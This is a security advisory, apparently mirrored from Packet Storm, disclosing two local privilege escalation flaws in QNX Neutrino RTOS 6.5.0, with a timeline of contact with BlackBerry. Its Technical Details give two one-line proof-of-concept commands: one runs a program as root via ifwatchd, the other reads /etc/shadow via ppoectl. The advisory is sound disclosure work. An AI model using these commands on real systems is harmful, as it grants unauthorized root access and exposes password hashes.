QNX Neutrino RTOS 6.5.0 Privilege Escalation

2014-03-13T00:00:00
ID PACKETSTORM:125699
Type packetstorm
Reporter Tim Brown
Modified 2014-03-13T00:00:00

Description

                                        
                                            `-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256  
  
Nth Dimension Security Advisory (NDSA20140311)  
Date: 11th March 2014  
Author: Tim Brown <mailto:timb@nth-dimension.org.uk>  
URL: <http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/>  
Product: QNX Neutrino RTOS 6.5.0   
<http://www.qnx.com/products/neutrino-rtos/index.html>  
Vendor: BlackBerry <http://www.blackberry.com/>  
Risk: Medium  
  
Summary  
  
This advisory concerns the forced disclosure of 2 vulnerabilities that were  
previously disclosed to BlackBerry. Disclosure has been forced since these  
vulnerabilities have been publicly disclosed (with PoC) on the exploit-db  
web site.  
  
Two local privilege escalation vulnerabilities have been identified that would  
ultimately result in malicious code being executed in a trusted context. The   
first allows direct code execution (http://www.exploit-db.com/exploits/32153/)  
whilst the second allows for the root password to be disclosed  
(http://www.exploit-db.com/exploits/32156/).  
  
It should be noted that Nth Dimension do not believe that the bug collision  
are due to a leak within BlackBerry but rather that these are the simply   
instances of multiple researchers identifying the same vulnerable code paths.  
  
Solutions  
  
Nth Dimension are not aware of vendor supplied patches at this moment in  
time.  
  
Technical Details  
  
1) The following PoC command causes id to be executed with euid 0:  
  
$ /sbin/ifwatchd -v -u id en0  
  
2) The following PoC command causes the first line of /etc/shadow (including the  
root user's password hash to be displayed:  
  
$ /sbin/ppoectl -f /etc/shadow  
  
History  
  
On 22th November 2012, Nth Dimension supplied a PoC exploits for each of the  
vulnerabilities outlined above. BlackBerry responded to confirm that they had  
received the report and were investigating.  
  
On the 17th June 2013, Nth Dimension chased BlackBerry for an update and were  
notified that BIRT2013-00001 had been assigned to to the privilege escalation  
issues.  
  
No further contact was received from BlackBerry after the 26th Julu 2013.  
  
Current  
  
As of the 11th March 2014, both the privilege escalation attacks have been   
disclosed by a 3rd party. In light of this and in the absence of any timely   
response from BlackBerry, Nth Dimension have opted to make full details public.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1  
  
iQIcBAEBCAAGBQJTH2qKAAoJEPJhpTVyySo7fFoP/2sWlwr2zhuVZEUYKkuuMLHK  
u3lP8lX55Fc/6T94D8HAhoaizoACEjZECmunwjUnaLZEP9IO5ksqJxadIrIDvGnx  
DgTTxDBqjUu8IZMsyS3hbMCfttKUeurBWk4zaQKTfzktTGwcx0hP1YjDnV2dlfxq  
rmqTcumzO0G3GRzOGMf0iYNd9NwuGTm6G89c90KkSaXuKBWMlifcBet5+xlqiIep  
ElUsM7G8EgHGHbglwoJEQNyQxn706ubjn+QYUEe34Ki7saZoYdZTcU/tid/q1thK  
qaajCooZkFePPfPfDIQnhGoMKPtMKIlyIBb+XbURKJMslpIwjIxG8oDND+Dr2Lpi  
gyS72w/H3X8cbUIFHL9w9tBYhgA7ygSCp2JEFB05iDFb2KJ++L1/VUW9Zd6aZOiS  
ffifs3QByToWJv2QGOBEoe5N7HcRYldBVBkeSDCJPFvxF30OpfirWwl5MtM1muBn  
9ddryvEALg4SeeSEcJp88KcWKgtEvqHEMsMru0tmqC4Yud4rs2Frz2g54sVOtamY  
vyFNX5DbvzFUqnJMKr6b1b6OTKdr6d94E4SaxIHGd9q9zcOOrMMGqidnmZffB3tf  
PwTNTc01KSDdJS4wMjNKuu7gPzazXJiIrajn6ogkHeN8+8IlAy9YVc2I95g20lr2  
ihPeOQ8Mx47ddyAqluNb  
=ObS5  
-----END PGP SIGNATURE-----  
`